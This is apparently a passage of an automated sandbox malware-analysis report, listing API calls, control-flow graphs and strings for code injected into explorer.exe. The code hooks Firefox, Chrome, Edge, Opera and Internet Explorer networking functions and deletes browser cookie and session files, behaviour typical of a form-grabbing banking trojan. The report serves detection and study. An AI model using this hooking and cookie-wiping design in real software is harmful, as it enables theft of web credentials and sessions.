                                      • Part of subcall function 0008118D: CryptDestroyHash.ADVAPI32(?), ref: 0008121E
                                      • Part of subcall function 0008118D: CryptReleaseContext.ADVAPI32(?,00000000), ref: 00081228
                                    • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 000838CD
                                    • GetLastError.KERNEL32 ref: 000838D3
                                    • RtlInitializeCriticalSection.NTDLL(00086038), ref: 000838F3
                                    • PathFindFileNameA.SHLWAPI(?), ref: 000838FA
                                    • lstrcat.KERNEL32(00085CDE,00000000), ref: 00083910
                                    • Sleep.KERNEL32(000001F4), ref: 0008392A
                                    • lstrcmpi.KERNEL32(00000000,firefox.exe), ref: 0008393C
                                    • GetCommandLineW.KERNEL32(?), ref: 0008394F
                                    • GetModuleHandleA.KERNEL32(kernel32.dll,VirtualQuery), ref: 0008397E
                                    • GetProcAddress.KERNEL32(00000000), ref: 00083987
                                    • GetModuleHandleA.KERNEL32(nspr4.dll,PR_GetDescType), ref: 000839AF
                                    • GetProcAddress.KERNEL32(00000000), ref: 000839B2
                                    • GetModuleHandleA.KERNEL32(nss3.dll,PR_GetDescType), ref: 000839C4
                                    • GetProcAddress.KERNEL32(00000000), ref: 000839C7
                                    • GetModuleHandleA.KERNEL32(nspr4.dll,PR_Write), ref: 000839E1
                                    • GetProcAddress.KERNEL32(00000000), ref: 000839E4
                                    • GetModuleHandleA.KERNEL32(nss3.dll,PR_Write), ref: 000839EC
                                    • GetProcAddress.KERNEL32(00000000), ref: 000839EF
                                    • lstrcmpi.KERNEL32(00000000,chrome.exe), ref: 00083A6D
                                    • GetCommandLineA.KERNEL32(NetworkService), ref: 00083A78
                                    • StrStrIA.SHLWAPI(00000000), ref: 00083A7B
                                    • lstrcmpi.KERNEL32(00000000,opera.exe), ref: 00083A8E
                                    • GetCommandLineA.KERNEL32(NetworkService), ref: 00083A9D
                                    • StrStrIA.SHLWAPI(00000000), ref: 00083AA0
                                    • GetModuleHandleA.KERNEL32(opera.dll), ref: 00083ABF
                                    • GetModuleHandleA.KERNEL32(opera_browser.dll), ref: 00083ACC
                                    • CommandLineToArgvW.SHELL32(00000000), ref: 00083956
                                      • Part of subcall function 000816C7: GetCurrentProcessId.KERNEL32 ref: 000816D9
                                      • Part of subcall function 000816C7: GetCurrentThreadId.KERNEL32 ref: 000816E1
                                      • Part of subcall function 000816C7: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 000816F1
                                      • Part of subcall function 000816C7: Thread32First.KERNEL32(00000000,0000001C), ref: 000816FF
                                      • Part of subcall function 000816C7: CloseHandle.KERNEL32(00000000), ref: 00081758
                                    • lstrcmpi.KERNEL32(00000000,iexplore.exe), ref: 00083A10
                                    • lstrcmpi.KERNEL32(00000000,microsoftedgecp.exe), ref: 00083A20
                                    • lstrcmpi.KERNEL32(00000000,msedge.exe), ref: 00083A30
                                    • GetCommandLineA.KERNEL32(NetworkService), ref: 00083A47
                                    • StrStrIA.SHLWAPI(00000000), ref: 00083A4A
                                    • GetModuleHandleA.KERNEL32(chrome.dll), ref: 00083A5F
                                    • GetModuleHandleA.KERNEL32(wininet.dll,HttpSendRequestA), ref: 00083B2C
                                    • GetProcAddress.KERNEL32(00000000), ref: 00083B35
                                    • GetModuleHandleA.KERNEL32(wininet.dll,HttpSendRequestW), ref: 00083B52
                                    • GetProcAddress.KERNEL32(00000000), ref: 00083B55
                                    • GetModuleHandleA.KERNEL32(wininet.dll,InternetWriteFile), ref: 00083B72
                                    • GetProcAddress.KERNEL32(00000000), ref: 00083B75
                                    • GetModuleHandleA.KERNEL32(wininet.dll,HttpQueryInfoA), ref: 00083B99
                                    • GetProcAddress.KERNEL32(00000000), ref: 00083B9C
                                    • GetModuleHandleA.KERNEL32(wininet.dll,InternetQueryOptionA), ref: 00083BA9
                                    • GetProcAddress.KERNEL32(00000000), ref: 00083BAC
                                    • GetModuleHandleA.KERNEL32(wininet.dll,InternetGetCookieA), ref: 00083BB9
                                    • GetProcAddress.KERNEL32(00000000), ref: 00083BBC
                                      • Part of subcall function 00081C08: RtlMoveMemory.NTDLL(00000000,?,00000000), ref: 00081C42
                                    • RtlExitUserThread.NTDLL(00000000), ref: 00083BD9
                                    • wsprintfA.USER32 ref: 00083C1F
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00083C69
                                    • Process32First.KERNEL32(00000000,?), ref: 00083C88
                                    • CloseHandle.KERNEL32(00000000), ref: 00083D77
                                    • Sleep.KERNELBASE(000003E8), ref: 00083D82
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.605265632.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: Handle$Module$AddressProc$Cryptlstrcmpi$CommandLine$CreateHash$CurrentProcesswsprintf$CloseContextFileFirstHeapNameSleepSnapshotThreadToolhelp32$AcquireAllocateArgvCriticalDataDestroyErrorExitFindInitializeLastMemoryMoveMutexParamPathProcess32ReleaseSectionThread32Userlstrcatlstrlen
                                    • String ID: %s%d%d%d$%s%s$HttpQueryInfoA$HttpSendRequestA$HttpSendRequestW$InternetGetCookieA$InternetQueryOptionA$InternetWriteFile$NetworkService$PR_GetDescType$PR_Write$VirtualQuery$chrome.dll$chrome.exe$fgclearcookies$firefox.exe$iexplore.exe$kernel32.dll$microsoftedgecp.exe$msedge.dll$msedge.exe$nspr4.dll$nss3.dll$opera.dll$opera.exe$opera_browser.dll$wininet.dll
                                    • API String ID: 2480436012-2618538661
                                    • Opcode ID: b9f6ff7a843870f369ebe3c7313e7c28a896d86895adef5c6821e2817a989fd5
                                    • Instruction ID: 4080beb071130776e6dd09e7f3c374191be514a04634faf7e68f9b4ce61aff03
                                    • Opcode Fuzzy Hash: b9f6ff7a843870f369ebe3c7313e7c28a896d86895adef5c6821e2817a989fd5
                                    • Instruction Fuzzy Hash: AEA1D370A40716A7E71077719C49E6F3A9CBF91B41B120524F6C1AB292EF79C9028FA6

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                      • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                    • PathCombineW.SHLWAPI(00000000,00000000,*.*), ref: 000815EB
                                    • FindFirstFileW.KERNELBASE(00000000,?), ref: 000815F7
                                    • lstrcmpiW.KERNEL32(?,000841C8), ref: 00081623
                                    • lstrcmpiW.KERNEL32(?,000841CC), ref: 00081633
                                    • PathCombineW.SHLWAPI(00000000,?,?), ref: 0008164C
                                    • PathMatchSpecW.SHLWAPI(?,Cookies*), ref: 00081661
                                    • PathCombineW.SHLWAPI(00000000,?,?), ref: 0008167E
                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 0008169C
                                    • FindClose.KERNELBASE(00000000), ref: 000816AB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.605265632.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: Path$CombineFind$FileHeaplstrcmpi$AllocateCloseFirstMatchNextProcessSpec
                                    • String ID: *.*$Cookies*
                                    • API String ID: 4256701249-3228320225
                                    • Opcode ID: de4fde3954acede6bbaa2663d65d846f994a8c3001a9ee01889cae48822a856e
                                    • Instruction ID: 8b79dbc0752a28f5ad1f1006910a533587f018e208c1d15e1b3a33415b5554fa
                                    • Opcode Fuzzy Hash: de4fde3954acede6bbaa2663d65d846f994a8c3001a9ee01889cae48822a856e
                                    • Instruction Fuzzy Hash: 832167712043169BD710BB60AC84ABF7BDCBF89795F040529FAC5D3241EB78DD464BA2

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 225 814d8-81527 call 813fe call 81000 wsprintfW FindFirstFileW 230 81599-815a6 call 81011 225->230 231 81529 225->231 233 8152b-81530 231->233 235 8157e-8158c FindNextFileW 233->235 236 81532-8153d call 813d7 233->236 235->233 237 8158e-81595 FindClose 235->237 236->235 240 8153f-81565 call 81000 wsprintfW 236->240 237->230 243 81570-81579 DeleteFileW call 81011 240->243 244 81567-8156a SetFileAttributesW 240->244 243->235 244->243
                                    APIs
                                      • Part of subcall function 000813FE: wsprintfW.USER32 ref: 0008142A
                                      • Part of subcall function 000813FE: FindFirstFileW.KERNELBASE(00000000,?), ref: 00081439
                                      • Part of subcall function 000813FE: wsprintfW.USER32 ref: 00081476
                                      • Part of subcall function 000813FE: RemoveDirectoryW.KERNEL32(00000000), ref: 0008149C
                                      • Part of subcall function 000813FE: FindNextFileW.KERNELBASE(00000000,00000010), ref: 000814AF
                                      • Part of subcall function 000813FE: FindClose.KERNEL32(00000000), ref: 000814BA
                                      • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                      • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                    • wsprintfW.USER32 ref: 0008150D
                                    • FindFirstFileW.KERNELBASE(00000000,?), ref: 0008151C
                                    • wsprintfW.USER32 ref: 00081557
                                    • SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0008156A
                                    • DeleteFileW.KERNELBASE(00000000), ref: 00081571
                                    • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00081584
                                    • FindClose.KERNELBASE(00000000), ref: 0008158F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.605265632.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: FileFind$wsprintf$CloseFirstHeapNext$AllocateAttributesDeleteDirectoryProcessRemove
                                    • String ID: %s%s$*.*
                                    • API String ID: 2055899612-705776850
                                    • Opcode ID: 80c984e5e7019e95e716a10583bb4acde58effe50df50ecf44e95ac5e90c50b4
                                    • Instruction ID: 5bb26f6c1dc7bd09f101a8d25e391cda339d68d8b89c612bbdf1b72f2cef919b
                                    • Opcode Fuzzy Hash: 80c984e5e7019e95e716a10583bb4acde58effe50df50ecf44e95ac5e90c50b4
                                    • Instruction Fuzzy Hash: 1F11B7312007055BE310BB649C49AEF7BDCFF95755F000519FED2922D3EB788A4687A6

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 246 813fe-81444 call 81000 wsprintfW FindFirstFileW 249 814c4-814d5 call 81011 246->249 250 81446 246->250 252 8144a-8144f 250->252 254 814a9-814b7 FindNextFileW 252->254 255 81451-8145c call 813d7 252->255 254->252 256 814b9-814c0 FindClose 254->256 255->254 259 8145e-8148c call 81000 wsprintfW call 814d8 255->259 256->249 263 81491-81499 259->263 264 8149b-8149c RemoveDirectoryW 263->264 265 814a2-814a4 call 81011 263->265 264->265 265->254
                                    APIs
                                      • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                      • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                    • wsprintfW.USER32 ref: 0008142A
                                    • FindFirstFileW.KERNELBASE(00000000,?), ref: 00081439
                                    • wsprintfW.USER32 ref: 00081476
                                      • Part of subcall function 000814D8: wsprintfW.USER32 ref: 0008150D
                                      • Part of subcall function 000814D8: FindFirstFileW.KERNELBASE(00000000,?), ref: 0008151C
                                      • Part of subcall function 000814D8: wsprintfW.USER32 ref: 00081557
                                      • Part of subcall function 000814D8: SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0008156A
                                      • Part of subcall function 000814D8: DeleteFileW.KERNELBASE(00000000), ref: 00081571
                                      • Part of subcall function 000814D8: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00081584
                                      • Part of subcall function 000814D8: FindClose.KERNELBASE(00000000), ref: 0008158F
                                    • RemoveDirectoryW.KERNEL32(00000000), ref: 0008149C
                                    • FindNextFileW.KERNELBASE(00000000,00000010), ref: 000814AF
                                    • FindClose.KERNEL32(00000000), ref: 000814BA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.605265632.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: FileFind$wsprintf$CloseFirstHeapNext$AllocateAttributesDeleteDirectoryProcessRemove
                                    • String ID: %s%s$%s%s\$*.*
                                    • API String ID: 2055899612-4093207852
                                    • Opcode ID: 6c666cde7a4b1b00ec48c3d571aa591b656f76482338ac601443b2c5c9d93ac3
                                    • Instruction ID: 7a152c0ea108eeacf04616a90babe5037b3a522f46ac4564a06091ccefb20d83
                                    • Opcode Fuzzy Hash: 6c666cde7a4b1b00ec48c3d571aa591b656f76482338ac601443b2c5c9d93ac3
                                    • Instruction Fuzzy Hash: D21190302043416BE710BB25EC49AFF76DCFFD5355F000529FAC192292DB79484A8B62

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 288 83d8d-83d97 call 81274 291 83d99-83dc2 call 81000 RtlMoveMemory 288->291 292 83e03-83e04 288->292 295 83de8-83dfc NtUnmapViewOfSection 291->295 296 83dc4-83de2 call 81000 RtlMoveMemory 291->296 298 83e0a-83e15 call 83be1 295->298 299 83dfe-83dff 295->299 296->295 306 83e20-83e23 298->306 307 83e17-83e1b call 83d8d 298->307 299->292 301 83e01-83e05 call 83862 299->301 301->298 307->306
                                    APIs
                                      • Part of subcall function 00081274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00081281
                                      • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                      • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                    • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 00083DAF
                                    • RtlMoveMemory.NTDLL(00000000,?,?), ref: 00083DE2
                                    • NtUnmapViewOfSection.NTDLL(000000FF), ref: 00083DEB
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.605265632.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: HeapMemoryMove$AllocateProcessQuerySectionUnmapViewVirtual
                                    • String ID:
                                    • API String ID: 4050682147-0
                                    • Opcode ID: 0bdd0153c5d571ba371ff687eaf063fdcaa43c021457fa3483b6ad3aa1bdb115
                                    • Instruction ID: dcd502424e309425fe8eb10f29b26712ba654105e7724c8cb1046160188aa2ce
                                    • Opcode Fuzzy Hash: 0bdd0153c5d571ba371ff687eaf063fdcaa43c021457fa3483b6ad3aa1bdb115
                                    • Instruction Fuzzy Hash: 4301D430400601AFDB28BB64EC58BEB3B9CFF85711F118529B5D6871E2CA7B8A41CF65

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 00081363: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00081374
                                      • Part of subcall function 00081363: Process32First.KERNEL32(00000000,?), ref: 00081393
                                      • Part of subcall function 00081363: CloseHandle.KERNELBASE(00000000), ref: 000813CB
                                      • Part of subcall function 00081363: lstrcmpi.KERNEL32(?), ref: 000813A3
                                      • Part of subcall function 00081363: Process32Next.KERNEL32(00000000,00000128), ref: 000813C0
                                    • Sleep.KERNELBASE(000003E8,?,00000000,00000001,?,?,00083839,?,00083C53,00000001), ref: 00083731
                                      • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                      • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                    • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000), ref: 00083752
                                    • lstrcatW.KERNEL32(00000000,\Google\Chrome\User Data\), ref: 00083764
                                      • Part of subcall function 000815BE: PathCombineW.SHLWAPI(00000000,00000000,*.*), ref: 000815EB
                                      • Part of subcall function 000815BE: FindFirstFileW.KERNELBASE(00000000,?), ref: 000815F7
                                      • Part of subcall function 000815BE: lstrcmpiW.KERNEL32(?,000841C8), ref: 00081623
                                      • Part of subcall function 000815BE: lstrcmpiW.KERNEL32(?,000841CC), ref: 00081633
                                      • Part of subcall function 000815BE: PathCombineW.SHLWAPI(00000000,?,?), ref: 0008164C
                                      • Part of subcall function 000815BE: FindNextFileW.KERNEL32(00000000,00000010), ref: 0008169C
                                      • Part of subcall function 000815BE: FindClose.KERNELBASE(00000000), ref: 000816AB
                                    • RtlZeroMemory.NTDLL(00000000,00001000), ref: 0008377A
                                    • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000), ref: 00083783
                                    • lstrcatW.KERNEL32(00000000,\Microsoft\Edge\User Data\), ref: 0008378F
                                    • RtlZeroMemory.NTDLL(00000000,00001000), ref: 000837A3
                                    • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 000837AC
                                    • lstrcatW.KERNEL32(00000000,\Opera Software\Opera Stable\), ref: 000837B8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.605265632.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: Path$FindFolderSpeciallstrcatlstrcmpi$CloseCombineFileFirstHeapMemoryNextProcess32Zero$AllocateCreateHandleProcessSleepSnapshotToolhelp32
                                    • String ID: Cookies*$\Google\Chrome\User Data\$\Microsoft\Edge\User Data\$\Opera Software\Opera Stable\$chrome.exe$msedge.exe$opera.exe
                                    • API String ID: 909495591-1175993956
                                    • Opcode ID: 75eec38487de135512deb4f16878f409bbec5ecf34d88790fb36fbef8542c3dd
                                    • Instruction ID: ec7ff4d470ff25c577ac56c1694f62454c323dd216fa13f948d3d90517649557
                                    • Opcode Fuzzy Hash: 75eec38487de135512deb4f16878f409bbec5ecf34d88790fb36fbef8542c3dd
                                    • Instruction Fuzzy Hash: 7011027034571632F22033615C82FEF258DFFA6BA1F100024F2C56A2C2DED89E0247AA

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 134 83be1-83c3a call 81000 * 2 wsprintfA call 81235 141 83c3c-83c4c call 81141 134->141 142 83c5e 134->142 148 83c4e call 83829 141->148 149 83c53-83c59 call 81261 141->149 144 83c64-83c74 CreateToolhelp32Snapshot 142->144 146 83c7a-83c8e Process32First 144->146 147 83d7d-83d88 Sleep 144->147 150 83d6e-83d70 146->150 147->144 148->149 149->142 153 83c93-83ca5 lstrcmpi 150->153 154 83d76-83d77 CloseHandle 150->154 155 83cda-83ce3 call 812aa 153->155 156 83ca7-83cb5 lstrcmpi 153->156 154->147 162 83d62-83d68 Process32Next 155->162 163 83ce5-83cee call 81305 155->163 156->155 157 83cb7-83cc5 lstrcmpi 156->157 157->155 159 83cc7-83cd4 call 82ea8 157->159 159->155 159->162 162->150 163->162 167 83cf0-83cf7 call 81320 163->167 167->162 170 83cf9-83d06 call 81274 167->170 170->162 173 83d08-83d5d lstrcmpi call 81090 call 81fe5 call 81090 170->173 173->162
                                    APIs
                                      • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                      • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                    • wsprintfA.USER32 ref: 00083C1F
                                      • Part of subcall function 00081235: OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 0008123F
                                      • Part of subcall function 00081235: MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,00000000,00083C33), ref: 00081251
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00083C69
                                    • Process32First.KERNEL32(00000000,?), ref: 00083C88
                                    • lstrcmpi.KERNEL32(?,firefox.exe), ref: 00083CA1
                                    • lstrcmpi.KERNEL32(?,iexplore.exe), ref: 00083CB1
                                    • lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 00083CC1
                                    • lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 00083D12
                                    • Process32Next.KERNEL32(00000000,00000128), ref: 00083D68
                                    • CloseHandle.KERNEL32(00000000), ref: 00083D77
                                    • Sleep.KERNELBASE(000003E8), ref: 00083D82
                                      • Part of subcall function 00081141: lstrlen.KERNEL32(?,?,?,00000000,?,000829DD,00000001), ref: 00081150
                                      • Part of subcall function 00081141: lstrlen.KERNEL32(:method POST,?,00000000,?,000829DD,00000001), ref: 00081155
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.605265632.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: lstrcmpi$FileHeapProcess32lstrlen$AllocateCloseCreateFirstHandleMappingNextOpenProcessSleepSnapshotToolhelp32Viewwsprintf
                                    • String ID: %s%s$fgclearcookies$firefox.exe$iexplore.exe$microsoftedgecp.exe
                                    • API String ID: 2509890648-2554907557
                                    • Opcode ID: 0d0ddd3babe7951f4962b83fe7927ab9f7e6e2b6a7115e594057a30b113bad32
                                    • Instruction ID: b3decc60f1b6fd0102e2c0e98a0bf13bb15c07833eab530b9c5dae2245e78d24
                                    • Opcode Fuzzy Hash: 0d0ddd3babe7951f4962b83fe7927ab9f7e6e2b6a7115e594057a30b113bad32
                                    • Instruction Fuzzy Hash: AF41E6316047029BD614BB74EC45ABF37ADBF94B40F000518B9D297192EF39DE068BA6

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 00081363: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00081374
                                      • Part of subcall function 00081363: Process32First.KERNEL32(00000000,?), ref: 00081393
                                      • Part of subcall function 00081363: CloseHandle.KERNELBASE(00000000), ref: 000813CB
                                      • Part of subcall function 00081363: lstrcmpi.KERNEL32(?), ref: 000813A3
                                      • Part of subcall function 00081363: Process32Next.KERNEL32(00000000,00000128), ref: 000813C0
                                    • Sleep.KERNELBASE(000003E8,?,00000000,?,0008382F,?,00083C53,00000001), ref: 000835FA
                                      • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                      • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                    • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000), ref: 00083613
                                    • lstrcatW.KERNEL32(00000000,\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\), ref: 00083623
                                    • wsprintfW.USER32 ref: 00083644
                                      • Part of subcall function 000814D8: wsprintfW.USER32 ref: 0008150D
                                      • Part of subcall function 000814D8: FindFirstFileW.KERNELBASE(00000000,?), ref: 0008151C
                                      • Part of subcall function 000814D8: wsprintfW.USER32 ref: 00081557
                                      • Part of subcall function 000814D8: SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0008156A
                                      • Part of subcall function 000814D8: DeleteFileW.KERNELBASE(00000000), ref: 00081571
                                      • Part of subcall function 000814D8: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00081584
                                      • Part of subcall function 000814D8: FindClose.KERNELBASE(00000000), ref: 0008158F
                                      • Part of subcall function 00081011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,000814CB), ref: 00081020
                                      • Part of subcall function 00081011: HeapFree.KERNEL32(00000000), ref: 00081027
                                    • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000021,00000000), ref: 00083672
                                    • lstrcatW.KERNEL32(00000000,00084614), ref: 00083682
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.605265632.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: FileHeap$Findwsprintf$CloseFirstFolderNextPathProcessProcess32Speciallstrcat$AllocateAttributesCreateDeleteFreeHandleSleepSnapshotToolhelp32lstrcmpi
                                    • String ID: %s%s$*.*$\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\$iexplore.exe$microsoftedge.exe$microsoftedgecp.exe
                                    • API String ID: 2436889709-3669280581
                                    • Opcode ID: fadd14bf89c54f29c561035e25b94334a211fe8576a283e6ce8d90d0ce59f8af
                                    • Instruction ID: 047cd47d4e76235a8978023a5c5691358bac471f200d8a84fde17aeb494bc27d
                                    • Opcode Fuzzy Hash: fadd14bf89c54f29c561035e25b94334a211fe8576a283e6ce8d90d0ce59f8af
                                    • Instruction Fuzzy Hash: 6F11703034060277FA143765AC9EFBE2599FFD6F42F150028B7C6AA2C2DE9849825769

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 00081363: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00081374
                                      • Part of subcall function 00081363: Process32First.KERNEL32(00000000,?), ref: 00081393
                                      • Part of subcall function 00081363: CloseHandle.KERNELBASE(00000000), ref: 000813CB
                                    • Sleep.KERNELBASE(000003E8,?,00000000,?,00083834,?,00083C53,00000001), ref: 000836B3
                                      • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                      • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                    • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 000836CC
                                    • lstrcatW.KERNEL32(00000000,\Mozilla\Firefox\Profiles\), ref: 000836DC
                                      • Part of subcall function 000814D8: wsprintfW.USER32 ref: 0008150D
                                      • Part of subcall function 000814D8: FindFirstFileW.KERNELBASE(00000000,?), ref: 0008151C
                                      • Part of subcall function 000814D8: wsprintfW.USER32 ref: 00081557
                                      • Part of subcall function 000814D8: SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0008156A
                                      • Part of subcall function 000814D8: DeleteFileW.KERNELBASE(00000000), ref: 00081571
                                      • Part of subcall function 000814D8: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00081584
                                      • Part of subcall function 000814D8: FindClose.KERNELBASE(00000000), ref: 0008158F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.605265632.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: File$Find$CloseFirstHeapwsprintf$AllocateAttributesCreateDeleteFolderHandleNextPathProcessProcess32SleepSnapshotSpecialToolhelp32lstrcat
                                    • String ID: \Mozilla\Firefox\Profiles\$cookies.sqlite$firefox.exe$sessionstore.*
                                    • API String ID: 2731919298-637609321
                                    • Opcode ID: 624656e6605f4b987df5a12e8ae5b15f913b8e14c12c72c41ec1462b20f1c9d9
                                    • Instruction ID: e4b6859fe632719e62c2471a373af4e41d7e2c2c30c1e964f33e307738a03490
                                    • Opcode Fuzzy Hash: 624656e6605f4b987df5a12e8ae5b15f913b8e14c12c72c41ec1462b20f1c9d9
                                    • Instruction Fuzzy Hash: A4F0A731300512339615336AAC0EDEF195DFFD7B52700012CB2C6962D2DE980943577A

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 279 81363-8137f CreateToolhelp32Snapshot 280 813d1-813d6 279->280 281 81381-81399 Process32First 279->281 282 813c6-813c8 281->282 283 813ca-813cb CloseHandle 282->283 284 8139b-813ab lstrcmpi 282->284 283->280 285 813b8-813c0 Process32Next 284->285 286 813ad-813b3 call 8133f 284->286 285->282 286->285
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00081374
                                    • Process32First.KERNEL32(00000000,?), ref: 00081393
                                    • lstrcmpi.KERNEL32(?), ref: 000813A3
                                    • Process32Next.KERNEL32(00000000,00000128), ref: 000813C0
                                    • CloseHandle.KERNELBASE(00000000), ref: 000813CB
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.605265632.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcmpi
                                    • String ID:
                                    • API String ID: 868014591-0
                                    • Opcode ID: 73177a2627c4fc77625abdc81e2021d595d42a0398085b95e880686d4ba7af21
                                    • Instruction ID: f597f1abedfdb78b4a50bf3d8acbfe31b34690e914edc3f9a8282d2ed78ac4e0
                                    • Opcode Fuzzy Hash: 73177a2627c4fc77625abdc81e2021d595d42a0398085b95e880686d4ba7af21
                                    • Instruction Fuzzy Hash: 34F0C8315011149BE7706B25AC08BDF7BBCFF09321F0001A0F9D9E2190EB784E558F91

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 309 81235-81247 OpenFileMappingA 310 81249-81259 MapViewOfFile 309->310 311 8125c-81260 309->311 310->311
                                    APIs
                                    • OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 0008123F
                                    • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,00000000,00083C33), ref: 00081251
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.605265632.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
